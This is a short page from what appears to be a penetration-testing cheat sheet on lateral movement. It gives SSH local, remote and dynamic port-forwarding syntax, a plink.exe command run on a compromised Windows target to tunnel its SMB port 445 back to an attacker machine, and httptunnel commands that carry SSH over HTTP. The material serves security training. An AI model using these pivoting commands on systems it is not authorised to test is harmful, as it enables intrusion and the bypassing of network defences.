Lateral movement

Pivoting / lateral movement / port forwarding / tunneling

Local port forwarding

Forward local port to remote host

ssh <gateway> -L <local port to listen>:<remote host>:<remote port>

Remote port forwarding

Forward remote port to local host

ssh <gateway> -R <remote port to bind>:<local host>:<local port>

Windows: forward local Windows port 445 to 444 at our attacking machine. First start ssh at our attacking machine:

service ssh start

Download plink.exe at target and execute (where x.x.x.x is our attacking machine):

plink.exe -l root x.x.x.x -R 444:127.0.0.1:445

Dynamic port forwarding

The -D flag makes SSH acting as a SOCKS (4,5) proxy server, which simply is a SSH tunnel in which specific applications forward the traffic through the tunnel to the remote server. Unlike local port forwarding, dynamic port forwarding can handle connections from multiple ports.

ssh -D <local proxy port> -p <remote port> <target>

Traffic encapsulation

SSH over HTTP

Using httptunnel

http will only with TCP services

At target: open port 80 and redirect incoming traffic from port 80 to port 22 (ssh service)

hts -F localhost:22 x.x.x.x:80

Where x.x.x.x = LAN or public IP from attacker

At client: start a tunnel on a random local port 6969 which is bound at port 80:

htc.exe -F 6969 x.x.x.x:80

At client: log in via SSH:

ssh -p 6969 localhost

PreviousPost exploitation NextBuffer overflow

Last updated 6 years ago

Was this helpful?